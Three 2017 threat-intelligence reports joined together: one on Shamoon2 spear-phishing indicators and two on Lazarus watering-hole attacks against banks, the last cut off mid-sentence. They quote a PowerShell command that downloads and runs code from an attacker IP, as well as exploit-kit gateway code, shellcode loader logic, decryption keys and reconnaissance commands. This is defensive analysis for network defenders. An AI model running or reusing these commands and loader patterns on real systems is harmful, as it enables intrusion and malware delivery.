Additional Insights on Shamoon2
arbornetworks.com/blog/asert/additional-insights-shamoon2/
2/21/2017
By Neal Dennis on 02/21/2017.
Posted in analysis, attack lifecycle, Interesting Research, Malware, threat analysis.
IBM analysts recently unveiled a first look at how threat actors may have placed Shamoon2
malware on systems in Saudi Arabia. Researchers showcased a potential malware lifecycle
which started with spear phishing and eventually led to the deployment of the disk-wiping
malware known as Shamoon. Their research showcased a set of downloaders and domains that
could potentially lead to a more extensive malware distribution campaign.
While researching elements in the IBM report, ASERT discovered additional malicious domains, IP addresses, and
artifacts. The basic functionality of the new documents and their PowerShell components matched what was
previously disclosed. For more information on the overall capabilities of the malware, please review IBM
s ongoing
research. It is our hope that by providing additional indicators, end-point investigators and network defenders will
be able to discover and mitigate more Shamoon2 related compromises.
Initial Discoveries
The following new samples were likely delivered via similar spear phishing campaigns as described in IBM
research. All three shared the same IPs and URLs, also provided below. These samples were located by pivoting on
document attributes. In this case, a sample from the IBM report indicated the document author
gerry.knight
which
led us to the following three additional samples. MD5
2a0df97277ddb361cecf8726df6d78ac
5e5ea1a67c2538dbc01df28e4ea87472
d30b8468d16b631cafe458fd94cc3196
104.218.120[.]128
69.87.223[.]26
5.254.100[.]200
URLs
analytics-google[.]org:69/checkFile.aspx
analytics-google[.]org
69.87.223[.]26:8080/p
The following is a screenshot of a macro-enabled document captured from sample
5e5ea1a67c2538dbc01df28e4ea87472:
Once enabled the extracted macro executed the following:
powershell.exe -w hidden -noni -nop -c
iex(New-Object
System.Net.WebClient).DownloadString(\
http://69.87.223.26:8080/p\
Pivoting on Passive DNS
From the previous samples, we performed a passive DNS lookup on the IPs. We found get.adobe.go-microstf[.]com
hosted at 104.218.120[.]128 around the time this campaign was ongoing, November 2016.
Researching the domain go-microstf[.]com, hosted at 45.63.10[.]99, revealed yet another iteration of malicious
executables. In this case, a URL used to download the PowerShell component shared a naming convention found in
the IBM report, http://69.87.223[.]26:8080/eiloShaegae1 and connected to the IP address used by the previous
three samples. The following are IOCs related to this domain:
83be35956e5d409306a81e88a1dc89fd
45.63.10[.]99
69.87.223[.]26
URLs
go-microstf[.]com
69.87.223[.]26:8080/eiloShaegae1
go-microstf[.]com/checkfile.aspx
The domain go-microstf[.]com was originally set up to spoof Google Analytics login page. The following screenshot
is from the malicious domain:
Possible Connections to Iranian state-sponsored Kittens
Finally, research yielded a relatively unique sample. This particular iteration was submitted to VirusTotal on
September 16, 2016. The majority of samples analyzed to date were submitted no earlier than mid-October, with
most being submitted in January 2017 or later. We were able to discover this particular version by diving further into
connections to analytics-google[.]org. Unlike newer samples, this one created a unique file
sloo.exe
. The file was
created at C:\Documents and Settings\Admin\Local Settings\Temp\sloo.exe. In addition to this file, the sample also
contacted 104.238.184[.]252 for the PowerShell executable.
Researchers at Palo Alto have attributed sloo.exe and related activities to threat actors of a likely Iranian statesponsored origin which they
ve named Magic Hound. The group Magic Hound is linked via infrastructure and tools
to the Rocket Kitten threat actor group although Palo Alto cannot confirm the extent of any relationship between the
two groups.
Dell Secureworks analysts recently concluded that domains discussed in the IBM report were linked to the Iranian
PuppyRAT. In addition, Dell analysts have assessed with high-confidence these activities are attributable to Iranian
state-sponsored activities.
IOCs for this version were:
07d6406036d6e06dc8019e3ade6ee7de
104.238.184[.]252
5.254.100[.]200
URLs
analytics-google[.]org:69/checkFile.aspx
Conclusion
These additional IOCs will hopefully provide more context into the ongoing threat. The link to possible Iranian threat
actors supports ongoing analysis that Shamoon2 was perpetrated by Iranian state-sponsored threat actors. The last
sample discussed may be malware-0 or at least part of the overall development and subsequent deployment of tools
used to install Shamoon on Saudi systems.
Consolidated IOC list:
2a0df97277ddb361cecf8726df6d78ac
5e5ea1a67c2538dbc01df28e4ea87472
d30b8468d16b631cafe458fd94cc3196
83be35956e5d409306a81e88a1dc89fd
07d6406036d6e06dc8019e3ade6ee7de
104.218.120[.]128
69.87.223[.]26
5.254.100[.]200
45.63.10[.]99
104.238.184[.]252
URLs
analytics-google[.]org:69/checkFile.aspx
analytics-google[.]org
69.87.223[.]26:8080/p
go-microstf[.]com
69.87.223[.]26:8080/eiloShaegae1
get.adobe.go-microstf[.]com
go-microstf[.]com/checkfile.aspx
Tags: disk wiper, IOCs, Iran, Saudi Arabia, Shamoon, Shamoon2
Lazarus
False Flag Malware
baesystemsai.blogspot.co.uk/2017/02/lazarus-false-flag-malware.html
Written by Sergei Shevchenko and Adrian Nish
BACKGROUND
We continue to investigate the recent wave of attacks on banks using watering-holes on at least two financial
regulator websites as well as others. Our initial analysis of malware disclosed in the BadCyber blog hinted at the
involvement of the 'Lazarus' threat actor. Since the release of our report, more samples have come to light, most
notably those described in the Polish language niebezpiecznik.pl blog on 7 February 2017.
MD5 hash
Filename
Compile Time
File Info
Submitted
9216b29114fb6713ef228370cbfe4045
srservice.chm
8e32fccd70cec634d13795bcb1da85ff
srservice.hlp
e29fe3c181ac9ddbb242688b151f3310
srservice.dll
2016-10-22
08:08
Win64 DLL
78 KB
2017-01-28
11:58
9914075cc687bdc352ee136ac6579707
fdsvc.exe
2016-08-26
04:19
Win64 EXE
60 KB
2017-02-05
15:14
9cc6854bc5e217104734043c89dc4ff8
fdsvc.dll
2016-08-26
04:11
Encrypted
470 KB
2017-02-05
15:15
Of the hashes provided, only three samples could be found in public malware repositories. All three had been
submitted from Poland in recent weeks.
In the analysis section below we examine these and the
false flag
approach employed by the attackers in order to
spoof the origin of the attack. The same
false flag
approach was also found in the SWF-based exploit mentioned in
our previous blogpost:
MD5 hash
Filename
File Info
Submitted
6dffcfa68433f886b2e88fd984b4995a
cambio.swf
Adobe Flash
2016-12-07 23:15
Here we
ll analyse these files as well as shed further light on the watering-hole exploit kit code itself, in the hope this
aids further detection and network defence.
ANALYSIS
Sample #1
srservice.chm
1/17
Most likely, this file is an encrypted backdoor that is decrypted and injected by DLL loader. The filename
srservice.chm is consistent with the method in which a known Lazarus toolkit module constructs CHM and HLP
file names:
%SYSTEMROOT%\Help\%MODULE_NAME%.chm
%SYSTEMROOT%\Help\%MODULE_NAME%.hlp
Sample #2
srservice.hlp
Most likely, this file is an encrypted configuration file, which is decrypted and loaded by the sample #1
(srservice.chm).
Sample #3
srservice.dll
This DLL loads, decrypts and injects the 'CHM' file into the system lsass.exe process.
Sample #4
fdsvc.exe
This file is a command line tool that accepts several parameters such as encrypted file name and process ID. The
tool reads and decrypts the specified file, and then injects it into the specified process or into the system process
explorer.exe.
The encryption consists of a running XOR, followed with RC4, using the 32-byte RC4 key below:
A6 EB 96 00 61 B2 E2 EF 0D CB E8 C4 5A F1 66 9C
A4 80 CD 9A F1 2F 46 25 2F DB 16 26 4B C4 3F 3C
Sample #5
fdsvc.dll
The file fdsvc.dll is an encrypted file, successfully decrypted into a valid DLL (MD5:
889e320cf66520485e1a0475107d7419) by the aforementioned executable fdsvc.exe.
Once decrypted, it represents itself as a bot that accepts the C&C name and port number(s) as a string parameter
that is used to call the DLL. The parameter is encoded with an XOR loop that includes XOR key cEzQfoPw.
Multiple C&C servers can be delimited with the ' |' character and port numbers are delimited from the C&C servers
with the ':' character.
Once the bot has established communication with the remote C&C, it uses several transliterated Russian words to
either indicate the state of its communication or issue backdoor commands, such as:
2/17
Word
State/Backdoor Command
"Nachalo"
start communication session
"ustanavlivat"
handshake state
"poluchit"
receive data
"pereslat"
send data
"derzhat"
maintain communication session
"vykhodit"
exit communication session
The binary protocol is custom. For example, during the "ustanavlivat" (handshake) mode, the bot accepts 4 bytes,
which are then decrypted. The decryption is a loop that involves multiple XOR operations performed over the
received data. Once decrypted, the 4 bytes indicate the size of the next data chunk to be received.
The next received data chunk is also decrypted, and its contents checked to see whether it's one of the backdoor
commands.
For example, the "poluchit" command instructs the bot to receive the file, and the "pereslat" (send) command
instructs the bot to upload the file. The received "poluchit" command may also contain a URL, marked with another
transliterated Russian word "ssylka" (link). In this case, the remote file is fetched in a separate thread. If a received
data chunk contains the command "vykhodit", the bot quits its backdoor loop.
The bot implements the SSL/TLS protocol, and is based on a source code of "Curl v7.49.1". Hence, it is able to
transfer files via HTTP, HTTPS, FTP, SMTP and many other protocols, with full support of user/password
authentication (Basic, Digest, NTLM, Negotiate, Kerberos), proxies and SSL certificates.
Russian language used in fdsvc.dll
In spite of some 'Russian' words being used, it is evident that the malware author is not a native Russian speaker.
Of our previous examples, five of the commands were likely produced by an online translation. Below we provide
the examples and the correct analogues for reference:
Word
Type of error
Correct analogue
"ustanavlivat"
omitted sign at the end, verb tense error
"ustanovit'" or "ustanoviti"
"poluchit"
omitted sign at the end
"poluchit'" or "poluchiti"
"pereslat"
omitted sign at the end
"pereslat'" or "pereslati"
"derzhat"
omitted sign at the end
"derzhat'" or "derzhati"
3/17
"vykhodit"
omitted sign at the end, verb tense error
"vyiti"
Another example is "kliyent2podklyuchit". This is most likely a result of an online translation of "client2connect"
(which means 'client-to-connect'). In this case, the two words "client" and "connect" were translated separately, then
transliterated from the Russian pronunciation form into the Latin alphabet and finally joined to produce
"kliyent2podklyuchit".
Such a result may look impressive to the bot's author, but would be difficult to understand for native Russian
speakers.
Here we provide an example of translating the word "client" in Russian - the word "kliyent" here only demonstrates
phonetic pronunciation, not how it's actually written in a transliterated form. When formed using the Latin alphabet, it
would actually be written "client" or "klient".
Due to such inconsistencies, we conclude that the Russian language is likely used as a decoy tactic, in order to
spoof the malware
s country of origin.
Sample #6
cambio.swf
During the investigation of the watering-hole incident, the owner of a compromised website shared with us a
malicious implant that was added into the site, presumably by using an exploit against JBoss 5.0.0.
The script is called view_jsp.java and is accessed from the watering-hole website as view.jsp.
This script is responsible for serving cambio.swf.
The infection starts from a primary web site being compromised so that its visitors are redirected into a secondary
website, calling its view.jsp script from an added IFrame. The initial request contains parameter pagenum set to
1, such as:
"GET /[PATH]/view.jsp?pagenum=1 HTTP/1.1"
This begins the profiling and filtering to identify potential victims. For example, the script then checks to see if the
4/17
client's IP is black-listed. If so, such initial request is rejected.
Next, the script checks if the client
s IP is white-listed (i.e. targeted). If not white-listed, it is also rejected. Hence,
unless the visitor
s IP is on the attackers
list, the script will not attempt to infect their machine. This helps the
infected websites stay undetected for relatively long period of time, as they only serve exploits to the selected
targets.
In the next stage of the script, it builds and serves back to the client an HTML page with an embedded JavaScript
that detects the type of client
s browser (Internet Explorer, Google Chrome, Firefox, Safari, or Opera), OS version,
and the loaded plugins, such as Adobe Flash and Microsoft Silverlight.
The script executed on a client side then builds a form, and submits it back to the gateway script, as shown below:
The submitted form specifies the pagenum parameter to be set to 2, to advance the script to the next step:
5/17
Once the script accepts the incoming request and finds the form's pagenum value is 2, it reads other fields from the
submitted form and decides which exploit to serve back to the client.
At the time of writing, the exploit kit known to serve back two exploits, for Adobe Flash and Microsoft Silverlight,
though these could be expanded upon as needed.
The exploits can be individually enabled or disabled by the attackers with the standalone file config.dat. For
example, to enable both exploits (flag=1), the contents of this file can be set to:
2016-0034:1
0000-0001:1
where 2016-0034 identifies the Silverlight exploit, and 0000-0001 is the Flash exploit.
If the script detects that the submitted form contains a non-empty version of Silverlight browser plugin, it will
generate and serve back a Silverlight exploit. If the submitted form has a non-empty version of Adobe Flash browser
plugin, the script will generate and serve back the Flash exploit. If the client has both plugins loaded within the
browser, then the script will serve the Flash exploit only.
NOTE: the script only serves the Flash exploit if the browser is Internet Explorer.
The exploits are generated by the functions:
genExp_20160034()
to generate Silverlight exploit
genExp_00000001()
to generate Flash exploit
The latter is explained in further detail below. First, the script builds URL string named as download_url:
String PARAMNAME_UID = "uid";
6/17
String PARAMNAME_PAGENUM = "pagenum";
String PARAMNAME_EXPLOITID = "eid";
String PARAMNAME_STATUS = "s";
String PARAMNAME_DATA = "data";
download_url = request.getRequestURL()
"?" + PARAMNAME_UID + "=" + uid +
"&" + PARAMNAME_PAGENUM + "=3" +
"&" + PARAMNAME_EXPLOITID +
"=" + exploit.get("eid");
download_url = download_url +
"&" + PARAMNAME_STATUS + "=2" +
"&" + PARAMNAME_DATA + "=";
For example, the URL string may look like:
http://[WEB_SITE]/view.jsp?uid=30304811&pagenum=3&eid=00000002&s=2&data=
Note that the pagenum parameter of the URL has now advanced to 3 (third step of the view.jsp execution).
This URL string will be embedded by the genExp_00000001() function into the body of the shellcode.
The output of the genExp_00000001() function is JavaScript that has the following format
this script will be
executed inside the client's browser:
var laskfji = 'PGh0bWw+..'; // long string
here
asdlfkj = function(s) {
// base64-decode string s
7/17
var polkio = asdlfkj(laskfji);
var poikea = 'document.write(polkio);';
eval(poikea);
Once the string s is base64-decoded by client-based JavaScript, it will look like a Flash object embedded into
HTML:
8/17
As seen in the Flash object parameters, the SWF object is served from the website
s path:
include/cambio.swf
However, the SWF object is also accompanied with 2 extra parameters:
SWF Parameter
Value
"shell"
558BEC83EC388D45C8C745F...
"Health"
polki89jdm#ks@
By looking into the decompiled cambio.swf file, its ActionScript reveals that the SWF file indeed expects 2
parameters: Health and shell.
The value of Health is used as an XOR key to decode the binary blob orinBin, which is included in the SWF file.
This blob is then loaded with loadBytes(), as shown below:
objLoader = new Loader();
this.params = loaderInfo.parameters;
var key:String = params["Health"] as String;
var pShell:String = params["shell"] as String;
var objShellData:SharedObject =
SharedObject.getLocal("Exp_Data");
objShellData.clear();
objShellData.data.shell = pShell;
objShellData.flush();
var blob:ByteArray = new orinBin() as ByteArray;
var i:int = 0;
while(i < blob.length)
9/17
blob[i] = blob[i] ^ key.charCodeAt(i % key.length);
i++;
blob.position = 0;
objLoader.contentLoaderInfo.addEventListener("complete",fncomp);
objLoader.loadBytes(blob);
Below is the binary blob orinBin as seen within the SWF file:
By knowing the value of Health parameter, it is now possible to use it as an XOR key to decode the orinBin blob
within the SWF code.
Once decrypted, the orinBin blob presents another SWF file. This time, it contains 3 encrypted blobs within:
bin22, bin23, and bin24 seen below:
The code decrypts the blobs with RC4, using "littleEndian" as the RC4 key. These blobs also turn out to be
SWF files that contain the SWF exploit code.
Internally, the ActionScript also uses transliterated Russian words, similar to the tactic seen in the bot code:
Transliterated Russian words used in AS
Translated from Russian
Podgotovkaskotiny
Preparation of farm animals
10/17
geigeigei3raza
Hey, hey, hey 3 times
chainik
Dummy (a stupid person)
chainikaddress
Dummy's address
poishemdatu
s search for data
poiskvpro
Searching in 'pro'
vyzov_chainika
Calling the dummy (a stupid person)
daiadreschainika
Get address of the dummy
runskotina
Execute farm animals
babaLEna
Old woman Lena
As seen in the table, while the words are technically Russian, their usage is out-of-context.
In one code fragment, the ActionScript contains both "chainik" and "dummy":
private function put_dummy_args(param1:*) :
return chainik.call.apply(null,param1);
private function vyzov_chainika() : *
return chainik.call(null);
As such, it is obvious that the word "dummy" has been translated into "chainik". However, the word "chainik" in
Russian slang (with the literal meaning of "a kettle") is used to describe an unsophisticated person, a newbie; while,
the word "dummy" in the exploit code is used to mean a "placeholder" or an "empty" data structure/argument.
In the same way, it is likely the word "farm animals" was originally used to represent "a beast". Yet, it has been
translated into a word that is only synonymous to "the beast" in a certain context.
As a result, they have used the words "farm animals" across the shellcode instead of "beast"; which makes little
sense.
11/17
As in the case of sample #5 ( fdsvc.dll), it is likely that this loose Russian translation, evidently performed by a
non-Russian speaker, is intended to spoof the malware origin.
Shellcode
The SWF's ActionScript then loads and executes the shellcode that was passed to the SWF file. As with the Health
parameter, by having access to the server-side code it is now possible to analyse what shellcode has been served to
be executed via SWF file.
The shellcode consists of 2,372 bytes of a Win32-code (in fact, 2,369 bytes padded with three zero bytes to make it
4-byte aligned).
The shellcode passed via the shell parameter consists of two parts:
The first part of the shellcode (818 bytes) creates a hidden process of notepad.exe. It then injects the
second part of the shellcode into it using the VirtualAlloc() and WriteProcessMemory() APIs, and finally it runs
the injected code with CreateRemoteThread() API.
The second part of the shellcode (1,551 bytes) is encoded with XOR 0x57:
seg000:00000316
ecx, 1551
; counter
seg000:0000031B
ebx, 57h
; XOR key
seg000:00000320
loop:
seg000:00000320
seg000:00000322
counter
; decrement
seg000:00000323
; advance pointer
seg000:00000324
test
ecx, ecx
seg000:00000326
short loop
[eax], ebx
It's worth noting that both parts of the shellcode load the APIs similarly to all other tools from the Lazarus toolset,
e.g.:
urlmon_dll = 'mlrU';
// Urlm
urlmon_dll_4 = 'd.no';
// on.d
12/17
urlmon_dll_8 = 'll';
// ll
URLDownloadToFileW = 'DLRU';
// URLD
URLDownloadToFileW_4 = 'lnwo';
// ownl
URLDownloadToFileW_8 = 'Tdao';
// oadT
URLDownloadToFileW_12 = 'liFo'; // oFile
URLDownloadToFileW_16 = 'We';
hLib = LoadLibrary(&urlmon.dll);
ptr[8] = (*(int)ptr[4])(hLib,
// eW
// ptr[4]->GetProcAddress
&URLDownloadToFileW);
Once decoded, the second part of the shellcode reads the URL embedded at the end, then downloads and saves a
file under a temporary file name, using the prefix "tmp".
Next, it reads the temporary file into memory, decrypts it with the following XOR loop, starting from the 318th byte:
for (i = 317; i < file_size; ++i )
buffer[i] ^= 0xCC ^ ((buffer[i] ^ 0xCC) >>
Next, it makes the decoded data executable by assigning it PAGE_EXECUTE_READWRITE memory protection mode,
and calls it, as shown below:
(*(void)(ptr[68]))(buffer + 318,
// ptr[68]->VirtualProtect
file_size - 318,
PAGE_EXECUTE_READWRITE,
&oldProtect);
((void (*)(void))(buffer + 318))();
// skip the first 318 bytes
// CALL from the 318th byte
13/17
This way, the 2nd part of the shellcode downloads a binary from the same gateway script as before. pagenum=3
means it's a 3rd step
a step of serving the next chunk of the shellcode.
To understand the next step we need to go back to the gateway script to see how it processes the pagenum=3
request.
When the script receives a pagenum=3 request, it checks the 's' URL parameter ('status'). Initially, this parameter
is set to 2 ('s=2', as seen in the aforementioned URL embedded into the SWF exploit).
Thus, the script will read and output the contents of 2 files stored on the web server:
files/mark180789172360.ico
files/back283671047171.dat
The first file is likely a valid ICO file, is 318 bytes in size, and its contents are not encoded (hence the reason why
the shellcode skips the first 318 bytes, and only decodes the rest).
The second file is a 3rd chunk of the shellcode, and its contents are encoded.
In addition to these 2 files, the output is appended with a URL. This time, it will specify pagenum parameter set to 3,
but the status parameter s will now be set to 3. For example, the URL may look like:
http://[WEB_SITE]/view.jsp?uid=30304811&pagenum=3&s=3
The appended URL will then be encoded the same way as the file back283671047171.dat:
for (int i = 0; i < len + 9; i++)
byte var = b[i];
byte temp = (byte)((var >> 4) &
0x0F);
var = (byte)(var ^ temp);
var = (byte)(var ^ 0xCC);
b[i] = var;
This way, the encoded URL becomes an integral part of the 3rd part of the shellcode
same way as the 2nd part of
the shellcode was appended with a URL.
Following that, the script serves back a blob that consists of three parts:
files/mark180789172360.ico, not encoded (318 bytes)
files/back283671047171.dat, encoded
14/17
download URL, encoded
It is served back as a binary file, disguised as an icon file probg[RANDOM].ico, probably in an attempt to bypass
network sniffers (in other words, the encrypted shellcode is served appended to a valid icon file):
response.setHeader("Accept-Ranges", "bytes");
response.setHeader("Content-Length", String.format("%d", response_len));
response.setHeader("Content-Disposition", "attachment;filename=\"probg" +
rand.nextInt(9000) + 10000 + ".ico\"");
response.setHeader("Content-Type", "application/octet-stream");
Once this 3rd part of the shellcode is served back to the shellcode that runs on a client side, it will skip the first 318
bytes, decode the rest and execute it. This will invoke another binary download
this time identified with the status
value of 3 ('s=3').
The new binary is generated by view.jsp script and is almost identical to the 3rd part of the shellcode.
The only difference is that the binary blob consists of these files:
files/mark180789172360.ico, not encoded (318 bytes), as before
files/meml102783047891.dat, encoded
The 2nd file is now different, and the URL is no longer appended. The reason why the new binary does not need the
URL embedded may be that this binary contains an actual malicious executable, detached, decoded, and executed
by the shellcode, thus leading to a full compromise of the victim.
Indeed, as seen in the web log below, the last GET request with the pagenum=3 and s=3 parameters is served with
a 123,710-byte response
large enough to accommodate a PE-executable:
"GET /[PATH]/view.jsp?pagenum=1 HTTP/1.1" 200 66148
"POST /[PATH]/view.jsp HTTP/1.1" 200 13991
"GET /[PATH]/view.jsp?uid=30304811&pagenum=3&eid=00000002&s=2&data= HTTP/1.1" 200
4642
"GET /[PATH]/view.jsp?uid=30304811&pagenum=3&s=3 HTTP/1.1" 200 123710
NOTE: At the time of analysis, the ICO/DAT files were not available. Hence, their contents remains unknown.
Overall Scheme
The following scheme illustrates the steps outlined above:
15/17
CONCLUSIONS
Here we have analysed further files from the recent watering-hole attacks directed at Polish financial institutions and
others. Evidently, the Lazarus group are continuing their campaign targeting banking networks. Their watering-hole
mechanism is fairly sophisticated
its multiple stages are designed to complicate analysis of its malware
distribution, and at the same, stay undetected for as long as possible.
Because of the previously disclosed attribution links, the group are also resorting to some trickery.
Through reverse-engineering, we can see the use of many Russian words that have been translated incorrectly. In
some cases the inaccurate translations have transformed the meaning of the words entirely. This strongly implies
that the authors of this attack are not native Russian speakers and, as such, the use of Russian words appears to be
a 'false flag'. Clearly the group behind these attacks are evolving their modus operandi in terms of capabilities
but
also it seems they
re attempting to mislead investigators who might jump to conclusions in terms of attribution.
APPENDIX A: INDICATORS OF COMPROMISE
16/17
MD5 Hashes
9cc6854bc5e217104734043c89dc4ff8
9914075cc687bdc352ee136ac6579707
e29fe3c181ac9ddbb242688b151f3310
9216b29114fb6713ef228370cbfe4045
8e32fccd70cec634d13795bcb1da85ff
889e320cf66520485e1a0475107d7419
6dffcfa68433f886b2e88fd984b4995a
Filenames
cambio.swf
cambio.xap
mark180789172360.ico
meml102783047891.dat
back283671047171.dat
URLs
view.jsp?pagenum=1
view.jsp?uid=
17/17
Lazarus & Watering-hole attacks
baesystemsai.blogspot.co.uk/2017/02/lazarus-watering-hole-attacks.html
On 3rd February 2017, researchers at badcyber.com released an article that detailed a series of attacks directed at
Polish financial institutions. The article is brief, but states that "This is
by far
the most serious information
security incident we have seen in Poland" followed by a claim that over 20 commercial banks had been confirmed
as victims.
This report provides an outline of the attacks based on what was shared in the article, and our own additional
findings.
ANALYSIS
As stated in the blog, the attacks are suspected of originating from the website of the Polish Financial Supervision
Authority (knf.gov[.]pl), shown below:
From at least 2016-10-07 to late January the website code had been modified to cause visitors to download
malicious JavaScript files from the following locations:
hxxp://sap.misapor[.]ch/vishop/view.jsp?pagenum=1
hxxps://www.eye-watch[.]in/design/fancybox/Pnf.action
Both of these appear to be compromised domains given they are also hosting legitimate content and have done for
some time. The malicious JavaScript leads to the download of malware to the victim
s device.
Some hashes of the backdoor have been provided in BadCyber's technical analysis:
85d316590edfb4212049c4490db08c4b
c1364bbf63b3617b25b58209e4529d8c
1bfbc0c9e0d9ceb5c3f4f6ced6bcfeae
The C&Cs given in the BadCyber analysis were the following IP addresses:
125.214.195.17
196.29.166.218
LAZARUS MALWARE
Only one of the samples referenced by BadCyber is available in public malware repositories. At the moment we
cannot verify that it originated from the watering-hole on the KNF website
but we have no reason to doubt this
either.
MD5 hash
Filename
File Info
First seen
Origin
85d316590edfb4212049c4490db08c4b
gpsvc.exe
Win32
(736 KB)
2017-01-26
07:46:24
The file is packed with a commercial packer known as 'Enigma Protector'. Once unpacked it drops a known
malware variant, which has been seen as part of the Lazarus group
s toolkit in other cases over the past year.
The unpacked executable takes several command line arguments:
-l: list service names, available for its own registration
-o: open specified event
-t: set specified event
-x [PASSWORD] -e [SERVICE_NAME]: drop/install DLL under specified [SERVICE_NAME]
-x [PASSWORD] -f [SERVICE_NAME]: recreate the keys that keep the password for the next stage DLL, under
the specified [SERVICE_NAME]
The provided password's MD5 hash is used as an RC4 password. On top of that, there is one more RC4-round,
using a hard coded 32-byte RC4 password:
53 87 F2 11 30 3D B5 52 AD C8 28 09 E0 52 60 D0 6C C5 68 E2 70 77 3C 8F 12 C0 7B
13 D7 B3 9F 15
Once the data is decrypted with two RC4 rounds, the dropper checks the decrypted data contains a valid 4-byte
signature: 0xBC0F1DAD.
WATERING HOLE ANALYSIS
The attacker content on the compromised sap.misapor[.]ch site was not accessible at the time of writing.
However, archived versions of some pages can be found:
http://web.archive[.]org/web/20170203175640/https://sap.misapor.ch/Default.html
http://web.archive[.]org/web/20170203175641/https://sap.misapor.ch/Silverlight.js
The Default.html contains code to load MisaporPortalUI.xap
a Silverlight application which likely would
contain the malicious first-stage implant. This is unfortunately not available for analysis currently.
ADDITIONAL WATERING HOLES
The eye-watch[.]in domain appears to have been used in watering-hole attacks on other financial sector
websites. On 2016-11-08 we observed connections to the site referred from:
hxxp://www.cnbv.gob[.]mx/Prensa/Paginas/Sanciones.aspx
This is the page for the Comisi
n Nacional Bancaria y de Valores (National Banking and Stock Commission of
Mexico), specifically the portion of their site that details sanctions made by the Mexican National Banking
Commission. This organisation is the Mexican banking supervisor and the equivalent of Poland's KNF.
In this instance the site redirected to the following URL:
hxxp://www.eye-watch[.]in/jscroll/images/images.jsp?pagenum=1
At the time of writing the compromise is no longer present and no archived versions of the page exist to show where
the compromise was located.
A further instance of the malicious code appears to have been present on a bank website in Uruguay around 201610-26 when a PCAP of browsing to the website was uploaded to VirusTotal.com.
This shows a GET request made to:
hxxp://brou.com[.]uy
Followed shortly after by connections to:
www.eye-watch[.]in:443
Unfortunately, the response was empty and it is not possible to assess what may have been delivered.
ADDITIONAL MALWARE AND EXPLOIT ACTIVITY
The compromised eye-watch[.]in domain has been associated with other malicious activity in recent months.
Below is a list of samples which have used the site:
MD5 hash
Filename
File Info
First seen
Origin
4cc10ab3f4ee6769e520694a10f611d5
cambio.xap
(73 KB)
2016-10-07
03:09:43
cb52c013f7af0219d45953bae663c9a2
svchost.exe
Win32 EXE
(126 KB)
2016-10-24
12:10:33
1f7897b041a812f96f1925138ea38c46
gpsvc.exe
Win32 EXE
(126 KB)
2016-10-27
14:29:58
911de8d67af652a87415f8c0a30688b2
gpsvc.exe
Win32 EXE
(126 KB)
2016-10-28
11:50:15
1507e7a741367745425e0530e23768e6
gpsvc.exe
Win32 EXE
(126 KB)
2016-11-15
18:20:34
The last 4 samples can loosely be categorised as the same malware variant, however the first sample appears to be
a separate exploit (as detailed later).
It is worth noting that these samples were all compiled after the domain began being used alongside the
knf.gov[.]pl watering-hole. Additionally, the samples uploaded from Poland and Uruguay match with the
watering-hole activity observed
suggesting this is all part of the same campaign.
Despite this potential connection to the Poland bank compromises, the malware is not particularly advanced
for
example using basic operations to gather system information. The malware attempts to run a series of commands
with cmd.exe and then returns the result via the C&C, eye-watch[.]in.
These commands are as follows:
cmd.exe /c hostname
cmd.exe /c whoami
cmd.exe /c ver
cmd.exe /c ipconfig -all
cmd.exe /c ping www.google.com
cmd.exe /c query user
cmd.exe /c net user
cmd.exe /c net view
cmd.exe /c net view /domain
cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings"
cmd.exe /c tasklist /svc
cmd.exe /c netstat -ano | find "TCP"
An example C&C beacon is seen below:
GET /design/dfbox/list.jsp?action=What&u=10729854751740 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101
Firefox/47.0
Host: www.eye-watch[.]in
SILVERLIGHT XAP FILE
The cambio.xap archive sample (4cc10ab3f4ee6769e520694a10f611d5) does not use eye-watch[.]in as a
C&C channel but instead was downloaded from the URL:
hxxps://www.eye-watch[.]in/design/fancybox/include/cambio.xap
'cambio' is Spanish for 'change'. The URL is similar to that noted in the BadCyber blog, and the use of an XAP file
matches what can be found in the Archive.org cache for the sap.misapor[.]ch site.
XAP is a software package format used for Microsoft Silverlight applications.
It can be opened as a standard ZIP archive and contains the following files:
AppManifest.xaml
Shell_siver.dll
System.Xml.Linq.dll
Together they form a re-packaged exploit for Silverlight based on CVE-2016-0034 (MS16-006)
a Silverlight
Memory Corruption vulnerability. The exploit has previously been used by several exploit kits including RIG and
Angler to deliver multiple crimeware tools.
The Shell_siver.dll file contains a compile path:
c:\Users\KKK\Desktop\Shell_siver\Shell_siver\obj\Release\Shell_siver.pdb
Internally, the code of this DLL loads a 2nd stage library called binaryreader.Exploit
as seen below with the
XOR-encoded string:
byte[] array = new byte[]
115,120,127,112,99,104,99,116,112,117,
116,99,63,84,105,97,125,126,120,101
this.InitializeComponent();
for (int i = 0; i < array.Length; i++)
array[i] ^= 17;
if (args.get_InitParams().get_Keys().Contains("shell32"))
type.InvokeMember("run", 256, null, obj, new object[])
This 2nd stage payload DLL contained within the assembly is 30,720 bytes in size and encoded with XOR 56:
Buffer.BlockCopy(Resource1._1, 54, array, 0,
30720);
for (int i = 0; i < array.Length; i++)
byte b = 56;
array[i] ^= b;
Once the payload stub is decoded, it represents itself as a PE-image, which is another .NET 4.0 assembly with the
internal name binaryreader.dll.
This second-stage DLL assembly, binaryreader.dll, is heavily obfuscated. The DLL (MD5 hash:
7b4a8be258ecb191c4c519d7c486ed8a) is identical to the one reported in a malware traffic analysis blog post
from March 2016 where it was used to deliver Qbot. Thus it is likely the code comes from a criminal exploit kit which
is being leveraged for delivery in this campaign.
A similarly named cambio.swf (MD5 hash: 6dffcfa68433f886b2e88fd984b4995a) was uploaded to
VirusTotal from a US IP address in December 2016.
IP WHITELISTS
When examining the code on the exploit kit website a list of 255 IP address strings was found. The IPs only
contained the first 3 octets, and would have been used to filter traffic such that only IPs on that subnet would be
delivered the exploit and payload.
The IP addresses corresponded to a mix of public and private financial institutions spread across the globe:
However, banks in some specific countries feature prominently in the list:
Rank
Country
Count
Poland
United States
Mexico
United Kingdom
Chile
Brazil
Peru
Colombia
Denmark
India
The prominence of Polish and Mexican banks matches the observation of watering-hole code on sites in both
countries.
CONCLUSIONS
The evidence available is currently incomplete and at the moment we can only conclude the following:
There has been a series of watering hole attacks on bank supervisor websites in Poland & Mexico, and a
state owned bank in Uruguay in recent months. These leverage Silverlight and Flash exploits to deliver
malware.
Investigators in Poland have identified known Lazarus group implants on bank networks and associated
this with the recent compromise of the Polish Financial Supervision Authority's website.
The technical/forensic evidence to link the Lazarus group actors (who we believe are behind the Bangladesh Bank
